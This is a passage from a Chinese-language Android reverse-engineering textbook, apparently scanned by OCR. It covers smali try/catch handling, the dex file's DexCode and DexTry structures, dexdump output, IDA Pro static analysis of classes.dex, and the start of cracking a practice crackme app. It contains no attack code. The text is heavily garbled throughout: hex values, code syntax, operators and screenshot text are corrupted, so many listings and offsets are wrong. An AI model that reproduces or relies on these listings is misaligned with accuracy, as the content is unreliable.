invoke-static (pl), Ljava/lang/Integer;-»valueOf(I)Ljava/lang/Integer; 

move-result-object v8 

aput-object v8, v6, v7 

const/4 v7, 0x1 

invoke-static (v1), Ljava/lang/Integer;-»valueOf(I)Ljava/lang/Integer; 

move-result-object v8 

aput-object v8, v6, v7 

const/4 v7, 0x2 

invoke-static (v2), Ljava/lang/Integer;--»valueOf(I)Ljava/lang/Integer; 

move-result-object v8 

aput-object v8, v6, v7 

const/4 v7, 0x3 

invoke-static (v3), Ljava/lang/Integer;-»valueOf(I)Ljava/lang/Integer; 

move-result-object v8 

aput-object v8, v6, v7 


.line 23 
invoke-static (v5, v6), Ljava/lang/String; 
->format (Ljava/lang/String; [Ljava/lang/Object;)Ljava/lang/String; 
move-result-object v4 
.line 25 
.local v4, str:Ljava/lang/String; 
const/4 v5, 0x0 
invoke-static (p0, v4, v5), Landroid/widget/Toast; 
-»makeText (Landroid/content/Context;Ljava/lang/CharSequence;I) 
Landroid/widget/Toast; 
move-result-object v5 
invoke-virtual (v5), Landroid/widget/Toast;-»show()V  # 使 用 Toast 显 示 格 
式 化 后 的 结果 
:try_end_1 # 第 2 个 try 结 束 


.Catch Ljava/lang/ArithmeticException; {i:try_start_l1 .. :try end 1) 
catch 0 # catch O0 

.catch Ljava/lang/NumberFormatException; (:try start 1 .. :try end 1) 
catch 1 # catch 1 

.line 33 

.end local v1 4i:I 

.end local v2 #m: I 

.end local v3 #n:I 

.end local v4 dstr:Ljava/lang/String; 

:goto O0 

return-void # 方 法 返回 

.line 26 

.restart local v1 #i:I 

:catch 0 

move-exception v0 

.line 27 

.local v0, e:Ljava/lang/ArithmeticException; 

:try start 2 # 第 3 个 try 开 始 


const-string v5, "\u4eba\u6570\u4e0d\u80fd\u4e3a0" #“ 人 数 不 能 为 0” 
const/4 v6, 0x0 
invoke-static (p0, v5, v6), Landroid/widget/Toast; 
-»makeText (Landroid/content/Context;Ljava/lang/CharSequence;I) 
Landroid/widget/Toast; 
move-result-object v5 
invoke-virtual (v5), Landroid/widget/Toast;-»show()V # 使 用 Toast 显 示 异 
常 原因 


:try end 2 # 第 3 个 try 结 束 

.catch Ljava/lang/NumberFormatException; (:try start 2 .. :try end 2) : 
catch 1 

goto :goto_0# 返 回 


.line 29 

.end local v0 *te:Ljava/lang/ArithmeticException; 
.end local v1 #i:I 

:catch 1 


move-exception v0 

.line 30 

.local v0, e:Ljava/lang/NumberFormatException; 

const-string v5, "Xu65e0Nu6548Nu7684Nu6570Nu503cNu5b57Nu7b26Nu4e32" 

#“ 无 效 的 数值 字符 串 ” 

invoke-static (p0, v5, v9), Landroid/widget/Toast; 
-»makeText (Landroid/content/Context;Ljava/lang/CharSequence;I) 
Landroid/widget/Toast; 

move-result-object v5 

invoke-virtual (v5), Landroid/widget/Toast;-»show()V  ”# 使 用 Toast 显 示 异 

常 原因 

goto :goto_0# 返 回 

.end method 


整 段 代码 的 功能 比较 简单 ， 输 入 鸡腿 数 与 人 数 ， 然 后 使 用 Toast 弹 出 鸡 
腿 的 分 配方 案 。 传 入 人 数 时 为 了 演示 Try/Catch 效 果 ， 使 用 了 String 类 型 。 代 
码 中 有 两 种 情况 下 会 发 生 异 常 : 第 一 种 是 将 String 类 型 转换 成 int 类 型 时 可 能 
会 发 生 NumberFormatException 异 常 ;， 第 二 种 是 计算 分 配方 法 时 除数 为 零 的 
ArithmeticException 异 常 。 

代码 中 的 try 语 句 块 使 用 try_start_ 开头 的 标号 注 明 ， 以 try_end_ 开 头 的 标 
号 结束 。 第 一 个 try 语 句 的 开头 标号 为 try_start 0， 结束 标号 为 try_end_0。 使 
用 多 个 try 语 句 块 时 标号 名 称 后 面 的 数值 依次 递增 ， 本 实例 代码 中 最 多 使 用 
到 了 try_end_2。 

在 try_end_0 标 号 下 面 使 用 “.catch” 指 令 指 定 处 理 到 的 异常 类 型 与 catch 的 
标号 ， 格 式 如 下 。 

catch < 异 系 关 型 > («try £A fy S .. <try ARE >} <catch 煌 号 > 

查看 catch_1 标 号 处 的 代码 发 现 ， 当 转换 String 到 int 时 发 生 异 常会 弹出 
“无 效 的 数值 字符 串 ” 的 提示 。 对 于 代码 中 的 汉字 ，baksmali 在 反 编 译 时 将 其 


使 用 Unicode 进 行 编码 ， 因 此 ， 在 阅读 前 需要 使 用 相关 的 编码 转换 工具 进行 
转换 。 

仔细 阅读 代码 会 发 现在 try_end_1 标 号 下 面 使 用 “.catch” 指 令 定义 了 
catch_ 0 与 catch_ 1 两 个 catch。 catch 0 标号 的 代码 开头 又 有 一 个 标号 为 
try_start_2 的 try 语 句 块 ， 其 实 这 个 try 语 句 块 是 虚构 的 ， 假 如 下 面 的 代码 。 


private void a() ( 


try ( 


s..... 


) catch (XXX) ( 


s..... 


} catch (YYY) ( 


当 执 行内 部 的 try 语 句 时 发 生 了 异常 ， 如 果 异 常 类 型 为 XXX， 则 内 部 
catch 就 会 捕捉 到 并 执行 相应 的 处 理 代 码 ， 如 果 异 常 类 型 不 是 XXX， 那 么 就 
会 到 外 层 的 catch 中 去 查找 异常 处 理 人 代码， 这 也 就 是 为 什么 实例 的 try_end_1 
标号 下 面 会 有 两 个 catch 的 原因 ， 另 外 ， 如 果 在 执行 XXX 异常 的 处 理 代 码 时 
又 发 生 了 异常 ， 这 个 时 候 该 怎么 办 ? 此 时 这 个 异常 就 会 扩散 到 外 层 的 catch 
中 去 ， 由 于 XXX 异常 的 外 层 只 有 一 个 YYY 的 异常 处 理 ， 这 时 会 判断 发 生 的 
异常 是 否 为 YYY 类 型 ， 如 果 是 就 会 进行 处 理 ， 不 是 则 抛 给 应 用 程序 。 回 到 
本 实例 中 来 ， 如 果 在 执行 内 部 的 ArithmeticException 异 常 处 理 时 再 次 发 生 别 
的 异常 ， 就 会 调用 外 层 的 catch 进 行 异常 捕捉 ， 因 此 在 try_end_2 标 号 下 面 有 
一 个 catch_1 就 很 好 理解 了 。 

在 Dalvik 指 令 集中 ， 并 没有 与 Try/Catch 相 关 的 指令 ， 在 处 理 Try/Catch 语 
句 时 ， 是 通过 相关 的 数据 结构 来 保存 异常 信息 的 。 回 忆 一 下 上 一 章 讲解 dex 
文件 格式 时 ， 曾 经 介绍 过 的 DexCode 数 据 结 构 ， 它 的 声明 如 下 。 


struct DexCode ( 
u2 registersSize;  /* 使 用 的 寄存 器 个 数 */ 


u2 insSize; /* 参数 个 数 */ 

u2 outsSize; /* 调用 其 它 方法 时 使 用 的 寄存 器 个 数 */ 
u2 triesSize; /* Try/Catch 个 数 */ 

u4 debugInfoOff; /* 指 问 调试 信息 的 偏 移 */ 

u4 insnsSize; /* 指令 集 个 数 ， 以 2 字 节 为 单位 */ 

u2 insns[1]; /* 指令 集 */ 


/* 2 字 节 空间 用 于 结构 对 齐 */ 

/* try item[triesSize] DexTry 结构 */ 

/* Try/Catch 中 handler 的 个 数 */ 

/* catch handler item[handlersSize] ，DexCatchHandler 结 构 */ 


); 
该 结构 下 面 的 try_item 就 保存 了 try 语 句 的 信息 ， 它 的 结构 DexTry 声 明 如 
下 。 
struct DexTry ( 
u4 startAddr; /* 起 始 地 址 */ 
u2 insnCount; /* 指令 数量 */ 
u2 handlerOff; /* handler 的 偏 移 */ 


); 

每 个 DexTry 保 存 了 try 语 句 的 起 始 地 址 和 指令 的 数量 ， 这 样 就 可 以 计算 
出 try 语 句 块 包含 的 地 址 范围 。 在 try_item 字 段 的 下 面 就 是 handler 的 个 数 。 下 
面 我 们 来 看 看 在 dex 文 件 中 存储 的 Try/Catch 人 信息， 该 实例 的 类 个 数 较 多 ， 手 
动 查找 比较 慢 ， 在 这 里 使 用 Android SDK 中 的 dexdump 工 上 只， 首先 使 用 解压 
缩 软 件 取 出 TryCatch.apk 中 的 classes.dex 文 件 ， 然 后 在 命令 提示 符 下 输入 以 
下 命令 : 

dexdump classes.dex > dump.txt 


打开 生成 的 dump.txt 文 件 ， 搜 索 tryCatch 可 找到 如 下 内 容 。 


#1 : (in Lcom/droider/trycatch/MainActivity;) 


name |. 'txryCatch' 

type : '(ILjava/lang/String;)V' 
access : 0x0002 (PRIVATE) 

code = 

registers $13 

ins A 

outs 63 

insns size  : 80 16-bit code units 
catches t 3 


0x0001 - 0x0004 
Ljava/lang/NumberFormatException; -» 0x0045 
0x0005 - 0x0038 
Ljava/lang/ArithmeticException; -> 0x0039 
Ljava/lang/NumberFormatException; -> 0x0045 
0x003a - 0x0044 


Ljava/lang/NumberFormatException; -» 0x0045 


从 上 面 的 输出 信息 中 ， 可 以 发 现 tryCatch() 方 法 是 私有 方法 ， 使 用 了 13 
个 寄存 器 ， 共 80 条 指令 ， 有 3 个 try 语 句 块 ， 共 有 2 个 异常 处 理 Handler。 其 
中 ，0x0001 - 0x0004 为 第 一 个 try 语 句 块 的 代码 范围 ，tryCatch() 方 法 的 代码 
位 于 0x2cb08， 因 此 计算 可 得 到 第 1 个 try 语 句 块 的 代码 范围 为 : 

(Ox2cb08 + 1 * 2) ~ (0x2cb08 + 4*2)= Ox2cb0a ~ 0x2cb10 

同样 可 计算 得 到 第 2 与 第 3 个 ty 语句 块 的 代码 范围 是 “0x2cb12 ~ 
0x2cb78” 与 “0x2cb7c~ 0x2cb90”。 最 后 ， 将 这 段 smali 代 码 整 理 为 Java 代 码 如 
下 。 


private void tryCatch(int drumsticks, String peple) ( 
try ( 
int i = Integer.parseInt(peple); 
try ( 
int m - drumsticks / i; 
int n - drumsticks - m * i; 
String str = String.format( 
"共有 %dq 只 鸡腿 ，g%q 个 人 平分 ， 每 人 可 分 得 sd 只 ， 还 剩 下 %q 只 "， 
drumsticks, i, m, n); 
Toast.makeText(MainActivity.this, str, Toast.LENGTH SHORT).show(); 
) catch (ArithmeticException e) ( 
Toast.makeText(MainActivity.this, "人数 不能 为 0"，Toast .LENGTH_ 
SHORT).show(); 
) 
) catch (NumberFormatException e) ( 
Toast .makeText (MainaActivitvy.this，" 无 效 的 数值 字符 串 "，mToast .LENGTH _ 
SHORT).show(); 


5.6 HIDA Pro 静 态 分 析 Android 程 序 


IDA Pro 是 目前 全 世界 最 强大 的 静态 反 汇 编 分 析 工 具 。 它 具备 可 交互 、 

可 编程 、 可 扩展 、 多 处 理 器 支持 等 众多 特点 。 使 用 IDA Pro 来 静态 分 析 程 序 

是 一 门 大 学 问 ， 关 于 它 的 完整 功能 与 使 用 方法 ， 绝 不 是 本 书 一 到 两 节 的 内 

容 就 可 以 前 述 清楚 的 ， 如 果 读 者 对 IDA Pro 不 了 解 或 者 没有 使 用 过 该 软件 ， 

请 读者 先 查 看 相关 的 技术 书籍 来 掌握 基本 的 使 用 方法 ， 推 荐 阅读 《IDA Pro 
权威 指南 (第 2 版 )》。 


5.6.1 IDA Pro 对 Android 的 支持 


IDA Pro 从 6.1 版 本 开始 ， 提 供 了 对 Android 的 静态 分 析 与 动态 调试 支 
持 。 包 括 Dalvik 指 令 集 的 反 汇编 、 原 生 库 (ARM/Thumb 代 码 ) 的 反 汇编 、 
原生 库 (ARM/Thumb 代 码 ) 的 动态 调试 等 。 具 体 可 查看 IDA Pro 官 方 的 更 新 
日 志 ， 链 接 如 下 : http://www.hex-rays.com/products/ida/6.1/index.shtmlo 


注意 
IDA Pro 是 商业 收费 软件 ， 而 且 价 格 不 菲 。 本 节 在 对 反 汇 编 代 码 进行 演示 与 讲解 时 ， 假 定 读者 已 
经 通过 正规 渠道 获得 了 IDA Pro 6.1 或 更 高 版 本 的 使 用 授权 ， 并 且 已 经 安装 配置 好 IDA Pro 软 件 。 笔 者 
在 编写 本 章 时 IDA Pro 最 新 版 本 为 6.3， 本 书 讲解 时 使 用 了 IDA Pro 6.1。 


5.6.2 ”如 何 操作 


以 5.2 节 的 crackme0502.apk 为 例 ， 首 先 解 压 出 classes.dex 文 件 ， 然 后 打开 
IDA Pro， 将 classes.dex 拖 放 到 IDA Pro 的 主 窗口 ， 会 弹出 加 载 新 文件 对 话 
框 ， 如 图 5-4 所 示 ，IDA Pro 解 析出 了 该 文件 属于 “Android DEX File”， 保 持 
默认 的 选项 ， 点 击 OK 按钮 ， 稍 等 片 站 DA Pro 就 会 分 析 完 dex 文 件 。 


* 


1i Load a new file 


Load file D: AworkspaceXchapter5 M5. 655. 6. 2Xclasses. dex as 
Android DEX file version 53.0 [dex. 1dw] 


Binary file 


Processor type 

Intel 80x88 processors: metapc v 
, ^ Analysis 
J Enabled 


| [7] Indicator enabled 


Options 

VERTU DN NIE Kernel options 1 
O Load resources 
Rename DLL entries 


[7 Mensa. loua 


Fill segment gaps 


Eod time 


Create FLAT group 


DLL directory |C: WINDOWS 


图 5-4 ”使 用 IDA Pro 加 载 classes.dex 文 件 


IDA Pro 支 持 结 构 化 形式 显示 数据 结构 ， 因 此 ， 我 们 有 必要 先 整理 一 下 
反 汇 编 后 的 数据 。dex 文 件 的 数据 结构 大 部 分 在 Android 系 统 源码 中 
dalvik\ibdex\DexFile.h 文 件 中 ， 笔 者 将 其 中 的 结构 整理 为 dex.idc 脚 本 ， 在 分 
析 dex 文 件 时 直接 导入 即 可 使 用 。 导 入 的 方法 为 点 击 IDA Pro 的 菜单 项 


“File > Script file”， 然 后 选择 dex.idc 即 可 。 点 击 IDA Pro 主 界面 的 Structures 选 
项 卡 ， 如 图 5-5 所 示 。 


File Edit Fup Search View Options Windows Help 
salia 9 AS SEG tt tX »00 OE 


F| Functions window ax |Œ) ID Yiech Hex View-A A) Structwes [3 | 国 Emms AD Isports 


一。 Exparts 


AecessibilityServiceInfoCompat cl: |00000900 [00000008 BYTES. COLLAPSED STRUCT DexfnnotationSetItem. PRESS KEYPAD "+" TO EXPAND] 


AecessibilityServiceInfo£ompat ini |[V0000909 [8888000801 BYTES. COLLAPSED STRUCT DexEncodedRrray. PRESS KEYPAD "+" TO EXPAND] 


z 


" 
" 
# 
" 
" 
" 
" 
" 
" 
" 
" 
ssibilityServieeInfoCompat fi BasooonG # [00000808 BYTES. COLLAPSED STRUCT DexParaneterünnotationsItem. PRESS KEYPAD "+" TO EXPAND] 
f| AecessibilityServicsInfoConpat fla, | üÜ0000000 # [00000008 BYTES. COLLAPSED STRUCT DexMethodRnnotationsItem. PRESS KEYPAD "+" TO EXPAND] 
" 
" 
" 
" 
" 
" 
" 
" 
" 
" 
" 
" 


function name Slo0000000 # Ins/Del : create/delete structure ] A 
[f] AecessibilityServiceInfeConpat$Acei S| N D/R/* : create structure member (data/ascii/array) 

[f] AecessibilityServieeInfeConpatAcey |00000000 # N : rename structure or structure member 

[| AccessibilityServiceInfeConpat$Ace. | oaggen HU : delete structure member 

[f| AecessibilityServieeInfeConpatfAce: |00000900 # [08080819 BYTES. COLLAPSED STRUCT DexMaplist. PRESS KEYPAD TO EXPAND] 

[f| AecessibilityServicsInf:ConpatfAcs, 88808008 # [B8880BOC BYTES. COLLAPSED STRUCT DexHapItem. PRESS KEYPAD TO EXPAND] 

因 MeessibilityServicenfeConpatfAcs: |00000000 # [00000000 BYTES. COLLAPSED STRUCT DexStringld. PRESS KEYPAD "+" TO EXPAND] 

[f| AecessibilityServiceInfsConpet$Acey | ÜUUDDDUDU # [00000008 BYTES. COLLAPSED STRUCT DexFieldld. PRESS KEYPAD "+" TO EXPAND] 

f| AecessibilityServiesInfeConpat$Acey 888000 S [BBBBBB02 BYTES. COLLAPSED STRUCT Dexfünnotationltem. PRESS KEYPAD "+" TO EXPAND] 

[F] AecessibilityServicsInfeConpat$Acs, |00000900 # [00000004 BYTES. COLLAPSED STRUCT DexTypeld. PRESS KEYPAD "+" TO EXPAND] 

[f] AecessibilitySerwiceInfeConpatAcey | DINGDN M [80800008 BYTES. COLLAPSED STRUCT DexClassLookup. PRESS KEYPAD “+” TO EXPAND] 

区 AecessibilityServi ceInfoConpatfAce 00000006 [00000028 BYTES. COLLAPSED STRUCT DexüptHeader. PRESS KEYPAD "+" TO EXPAND] 

[T] MecessibilitySersicsInfsConpatAes, | 000800080 H [98999690 BYTES. COLLAPSED STRUCT DexAnnotationSetRefItem. PRESS KEYPAD “+” TO EXPAND] 
四 

ra 

因 


加 AecessibilityServiceInfoComnpat gett — 80808080 [00000008 BYTES. COLLAPSED STRUCT DexFieldannotationsIten. PRESS KEYPAD "+" TO EXPAND] 
|] AecessibilityServi ceInfoConpat, etl 09008000 [80088018 BYTES. COLLAPSED STRUCT DexAnnotationsDirector em. PRESS KEYPAD "+" TO EXPAND] 
因 AcceszibilityServiceInfoCompat get)  |U0000000 [S8800801 BYTES. COLLAPSED STRUCT DexLink. PRESS KEYPAD TO EXPAND] 

LE] AccessibilityServiceInfoConpat getl 000090000 [00000008 BYTES. COLLAPSED STRUCT DexTry. PRESS KEYPAD "+" TO EXPAND] 

f| AccessibilityServiceInfoCompat eett (0O9NAAON [90880015 BYTES. COLLAPSED STRUCT DexCode. PRESS KEYPAD "*'" TO EXPAND] 

四 | AccezsibilityServiceInfoConpatIcz_ |00000000 [08000008 BYTES. COLLAPSED STRUCT DexTypeList. PRESS KEYPAD "+" TO EXPAND] 

国 AccessibilityServicelnfoCompatIes , — | Uf [00000002 BYTES. COLLAPSED STRUCT DexTypeltem. PRESS KEYPAD '"«" TU EXPAND] 

[f] AccessibilityServieeInfoConpatles ; |00000000 [00000020 BYTES. COLLAPSED STRUCT DexClassDef. PRESS KEYPAD '"«" TO EXPAND] 

四 AeceziibilityServiceInfoCompatIcs , |88009000 [S888888C BYTES. COLLAPSED STRUCT DexProtold. PRESS KEYPAD TO EXPAND] 

加 | AecessibilityServiceInfeConpatIes 1  ü8000080 # [00000008 BYTES. COLLAPSED STRUCT DexMethodId. PRESS KEYPAD "+" TO EXPAND] 

ud AccessibilityServiceInfoCompatIcs | | BÜGOBDUBU [00060008 BYTES. COLLAPSED STRUCT DexfünnotationSetReflist. PRESS KEYPAD "+" TU EXPAND] 
[L] ContestConpet init ey w||"aanaann [98880878 BYTES. COLLAPSED STRUCT DexHeader. PRESS KEYPAD "+" TO EXPAND] 

$ > 


2. DexMapitem:0000 


E] 
> X | 区 


图 5-5 ”导入 dex.idc 


点 击 IDA View-A 选 项 卡 ， 回 到 反 汇 编 代 码 界 面 ， 然 后 点 击 菜单 项 
“Jump > Jump to address”， 或 者 按 下 快捷 键 G， 弹 出 地 址 跳 转 对 话 框 ， 输 入 0 
让 IDA Pro 跳 转 到 dex 文 件 开头 。 将 鼠标 定位 到 注释 “# Segment type: Pure 
data” 所 在 的 行 ， 然 后 点 击 菜 单项 “Edit — Structs ^ Struct var"， 或 者 按 下 快捷 
键 ALT+Q， 弹 出 选择 结构 类 型 对 话 框 ， 如 图 5-6 所 示 ， 选 择 DexHeader 后 点 
击 OK 按 钮 返回 。 


EJ Choose a structure type 


DexMapLi st 

DexMapItem 

DexStringId 

DexFieldId 
DexAnnotationltem 
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exMe 0070 


Line 25 of 25 


图 5-6 ”选择 结构 类 型 


此 时 ，dex 文 件 开头 的 0x70 个 字 节 就 会 格式 化 显示 ， 效 果 如 图 5-7 所 示 。 
同样 ， 读 者 可 以 手动 对 dex 文 件 中 其 它 的 结构 进行 整理 ， 如 DexHeader 下 面 
的 DexStringId 结 构 。 


HERDER:88888888 i: seg 中 nt type: Pure data 

HERDER:88888888 stru 8: -byte 8x65, 0x65, 0x78, OXA, 8x38, 0x33, 0x35, 8H magic 

HEADER : 88688888 # DATA XREF: AccessibilityServiceInfoCompat$Accessibi 
HEADER : 0000000 # fAccessibilityServiceInfoCompat$AccessibilityService 
HEADER : 88888888 -int 8x3518E6ó6R # checksum 

HEADER : 808860688 -byte 8x35, 8xE7, 5, 0x20, 0x75, 0x16, Gx5E, BxA8, Bx2E# signature 
HEADER : 00000000 -byte 8xE5, 0x27, 8xB8, GxB9, GOXFC, GxD9, Bx2F, 0x17, 5# signature 
HEADER : 88888888 -byte GxAF, GxBA # signature 

HEADER : 868686886800 -int Gx4F42C # fileSize 

HEADER : 88688888 -int 8x78 # headerSize 

HEADER : 88888888 -int 0x12345678 # endianTag 

HEADER : 88688888 -int 8 # linkSize 

HEADER : 888808880 -int 8 # 1ink0ff 

HEADER : 88888888 -int 8üxaF35C # mapOff 

HEADER : 80888808 -int 8xE56 # stringIdsSize 

HEADER : 88868888 .int 8x78 # stringIdsOüff 

HEADER : 888688888 .int 8x218 # tyupelIdsSize 

HEADER : 88868888 -int 8x3968 # typeldsOff 

HEADER : 88888888 -int 8x2B3 # protoIdsSize 

HEADER : 88888888 -int 8x4288 # protoIds0ff 

HEADER : 88688888 -int 8x2E9 # fieldIdsSize 

HEADER : 88688888 -int 8x626C€ # fieldIds0ff 

HEADER : 88888888 -int 8xC55 # methodIdsSize 

HEADER : 880888888 -int 0x79B4 # methodIds0ff 

HEADER : 008860008 -int 0x127 # classDefsSize 

HEADER : 888688888 -int 8xDC5^ # classDefsÜüff 

HEADER : 88888888 -int 8x3F2F8 # dataSize 

HEADER : 88888888 -int 8x18134 # dataüff 


图 5-7 格式 化 后 的 DexHeader 结 构 


点 击 菜单 项 “Jump Jump to segment”， 或 者 按 下 快捷 键 CTRL+S， 弹 出 
段 选择 对 话 框 ， 如 图 5-8 所 示 ，IDA Pro 将 dex 文 件 一 共 分 成 了 9 个 段 ， 其 中 前 
7 个 段 由 DexHeader 结 构 给 出 ， 最 后 2 个 段 可 以 通过 计算 得 出 。 仔 细 查 看 段 
名 ， 可 以 发 现 IDA Pro 对 其 命名 不 是 很 好 ， 有 3 个 HEADER 段 与 2 个 CODE 
段 ， 笔 者 觉得 第 3 个 段 改 名 为 PROTOS 更 合适 一 些 ， 还 有 第 6 个 段 改 名 为 
CLASSDEFS 更 好 ，IDA Pro 为 什么 这 样 命名 我 们 不 得 而 知 ， 不 过 ， 我 们 需 
要 知道 每 个 段 具 体 所 代表 的 含义 。 


HEADER : 80680888 -int 8xE56 # stringIdsSize 
HEADER : 88088088 -int 0x78 # StringIds0ff 
HEADER : 00000068 -int 0x210 # typeldsSize 
HEADER : 88888668 # typelIdsOff 
HEADER : 88880888 -int 8x2B3 # protoIdsSize 
HEADER : 86600888 -int 60x54288 # protoIdsOüff 
HEADER : 08888868 -int 8x2E9 # fieldIdsSize 
HEADER : 88880088 -int 8x626€ # fieldIdsÜff 
HEADER : 88888888 -int 8xC55 # nethodIdsSize 
HEADER : 88880888 -int 0x79B4 # methodIdsOff 
HEADER : 88888888 -int 8x127 # classDefsSize 
HEADER : 86888088 -int 8xDC5h # classDefsOÜff 
HEADER : 88888888 -int 8x3F2F8 # dataSize 
HEADER : 88888888 -int 8x181354 # dataüff 


HEADER : 08800078 DexStrin 


R L 

4 00000000 000039C8 TORT Rd L 0000 public : 

45| TYPES D00039C8 00004208 mom o L byte 0000 publie DATA 32 FPEF- 
45| HEADER 00004208 00000626C T? L byte 0000 public DATA 32 FERES 
45| FIELDS 0000626C 00007984 iii: 9 L byte 0000 public DATA 32 2 
[a5] METHODS 00007984 0D000DC54 t? L byte 0000 public DATA 32 FEFF-e 
人 | HEADER 0000DC54 00010134 *? 7 7 L byte 0000 public DATA 32 FEFE. 
25| CODE 00010134 0002F9C8 fou oU L byte 0000 public DATA 32 EFFE- 
45| STRINGS 0D002F9C8 000423D7 "oT ow L byte 0000 public DATA 32 PERE 
45| CODE 00042307 0004F42C PEET L byte 0000 public DATA 32 FEFF- 


Line 1 of 9 


图 5-8 ”dex 文 件 的 9 个 段 


dex 文 件 中 所 有 方法 可 以 点 击 Exports 选 项 卡 查看 。 方 法 的 命名 规则 为 
“类 名 . 方法 名 @ 方法 声明 ”。 在 Exports 选 项 卡 中 随便 选择 一 项 ， 如 
SimpleCursorAdapter.swapCursor@LL， 然 后 双击 跳 转 到 相应 的 反 汇编 代码 
处 ， 该 处 的 代码 如 下 。 


CODE: 0002CFCC Method 2589 (0xald): 
CODE:0002CFCC public android.database.Cursor 


CODE: 0002CFCC android.support.v4.widget.SimpleCursorAdapter.swapCursor( 

CODE: 0002CFCC android.database.Cursor p0) # 方 法 声明 

CODE: 0002CFCC this = v2  #this3 引 用 

CODE: 0002CFCC p0 = v3 # 第 一 个 参数 

CODE: 0002CFCC invoke-super (this, p0}, «ref ResourceCursorAdapter. 
swapCursor(ref) imp. @ def ResourceCursorAdapter 
swapCursorQGLL- 

CODE:0002CFD2 move-result-object v0 

CODE:0002CFD4 iget-object v1, this, SimpleCursorAdapter mOriginalFrom 

CODE: 0002CFD8 invoke-direct (this, v1), «void SimpleCursorAdapter. 


findColumns(ref) SimpleCursorAdapter findColumnsQVL» 
CODE:0002CFDE 
CODE: 0002CFDE locret: 
CODE:0002CFDE return-object v0 
CODE: 0002CFDE Method End 


IDA Pro 的 反 汇编 代码 使 用 ref 关 键 字 来 表示 非 Java 标 准 类 型 的 引用 ， 如 
方法 第 1 行 的 invoke-super 指 令 的 前 半 部 分 如 下 。 

invoke-super {this, p0}, <ref ResourceCursorAdapter.swapCursor (ref) 

前 面 的 ref 是 swapCursor() 方 法 的 返回 类 型 ， 后 面 括号 中 的 ref 是 参数 类 
AU, 

后 半 部 分 的 代码 是 IDA Pro 智 能 识别 的 。IDA Prof% BE TH 3 Android 
SDK 的 API 了 国 数 并 使 用 imp 关 键 字 标识 出 来 ， 如 第 1 行 的 invoke-super 指 令 的 
后 半 部 分 如 下 。 

imp. @ def ResourceCursorAdapter swapCursorGLL 

imp 表 明 该 方法 为 Android SDK 中 的 API，@ 后 面 的 部 分 为 API 的 声明 ， 
类 名 与 方法 名 之 间 使 用 下 划 线 分 隔 。 

IDA Pro 能 识别 隐 式 传递 过 来 的 this 引 用 ， 在 smali 语 法 中 ， 使 用 p0 寄 存 
器 传递 this 指 针 ， 此 处 由 于 this 取 代 了 p0， 所 以 后 面 的 寄存 器 命名 都 依次 减 
Tlo 

IDA Pro 能 识别 代码 中 的 循环 、switch 分 支 与 Try/Catch 结 构 ， 并 能 将 它 
们 以 类 似 高 级 语言 的 结构 形式 显示 出 来 ， 这 在 分 析 大 型 程序 时 对 了 解 代码 


结构 有 很 大 的 帮助 。 具 体 的 代码 反 汇编 效果 读者 可 以 打开 5.2 节 使 用 到 的 
SwitchCase.apk 与 TryCatch.apk 的 classes.dex 文 件 自行 查看 。 


^" 定位 关键 代码 一 一 使 用 IDA Pro 进 行 破解 的 实 


使 用 IDA Pro 定 位 关键 代码 的 方法 整体 上 与 定位 smali 关 键 代码 差不多 。 

第 一 种 方法 是 搜索 特征 字符 串 。 首 先 按 下 快捷 键 CTRL+S 打 开 段 选择 对 
话 框 ， 双 击 STRINGS 段 跳 转 到 字符 串 段 ， 然 后 点 击 菜单 项 <*Search -> text" , 
或 者 按 下 快捷 键 ALT+T， 打 开 文 本 搜索 对 话 框 ， 在 String 劳 边 的 文本 框 中 输 
入 要 搜索 的 字符 串 后 点 击 OK 按 钮 ， 稍 等 片刻 就 会 定位 到 搜索 结果 。 不 过 目 
前 IDA Pro 对 中 文字 符 串 的 显示 与 搜索 都 不 支持 ， 如 果 字 符 串 中 的 中 文字 符 
显示 为 乱码 ， 需 要 编写 相关 的 字符 串 处 理 插 件 来 解决 ， 这 个 工作 就 交 给 读 
者 去 完成 了 。 

第 二 种 方法 是 搜索 关键 API。 首 先 按 下 快捷 键 CTRL+S 打 开 段 选择 对 话 
JE, XX E$ — T CODE 段 跳 转 到 数据 起 始 段 ， 然 后 点 击 菜 单项 
“Search -text”， 或 者 按 下 快捷 键 ALT+T， 打 开 文 本 搜索 对 话 杠 ， 在 String 旁 
边 的 文本 框 中 输入 要 搜索 的 API 名 称 后 点 击 OK 按钮 ， 稍 等 片刻 就 会 定位 到 
搜索 结果 。 如 果 API 被 调用 多 次 ， 可 以 按 下 快捷 键 CTRL+T 来 搜索 下 一 项 。 

第 三 种 方法 是 通过 方法 名 来 判断 方法 的 功能 。 这 种 办 法 比较 笨拙 ， 对 
于 混淆 过 的 代码 ， 定 位 关键 代码 比较 困难 。 比 如 ， 我 们 知道 
crackme0502.apk 程 序 的 主 Activity 类 为 MainActivity， 于 是 在 Exports 选 项 卡 页 
面 上 输入 Main， 代 码 会 自动 定位 到 以 Main 开 头 的 所 在 行 ， 如 图 5-9 所 示 ， 可 
粗略 判断 出 每 个 方法 的 作用 。 


Buildconfig.<init2aVY 00020028 2974 


3 Mainåctivity$1. <init>@VL 00020040 
MainActivity$1. onClickVL OO002DO05C 2976 
MainActivity$2. <init>@VL 00020078 2977 
MainActivity$2. onCliclaVL 00020094 2978 
MainActivity$SNChecker. Sini t>@VLL O002D0FC 2979 
MainActivity$SNChecker. isRegistered(2Z 0002D11C 2980 
MainActivity. &nit2gV 00020200 2981 
Mainåctivity. access$OGVL 00020218 2982 
MainAÁctivity. access$1GLL 00020230 2983 
MainÁctivity. getAÀnnotationszí?V 00020248 2985 
MainActivity. onCreatef2VL 00020384 2987 
MainActivity. onCreateÜOptionsMenuf2ZL 00020410 2988 


图 5-9 ”定位 MainActivity 


下 面 我 们 来 尝试 破解 一 下 crackme0502.apk。 首 先 安装 运行 apk 程 序 ， 程 
序 运 行 后 有 两 个 按钮 ， 点 击 “ 获 取 注 解 ” 按 钮 会 Toast 弹 出 3 条 信息 。 在 文本 框 
中 输入 任何 字符 串 后 ， 上 点 击 * 检 测 注册 码 ” 按 钮 ， 程 序 弹出 注册 码 错误 的 提 
示 信 息 。 这 里 我 们 以 按钮 事件 响应 为 突破 口 来 查找 关键 代码 ， 通 过 图 5-9 我 
们 可 以 发 现 有 两 个 名 为 OnClick() 的 方法 ， 那 具体 是 哪 一 个 呢 ? 我 们 分 别 进 
去 看 看 。 前 者 调用 a RAE 在 IDA Pro 的 反 汇编 界 面 
双击 MainActivity access 可 以 看 到 它 其 实 调 用 了 MainActivity 的 
getAnnotations() 方 法 ， 看 到 这 里 应 n ; MainActivity$1.onClick0 
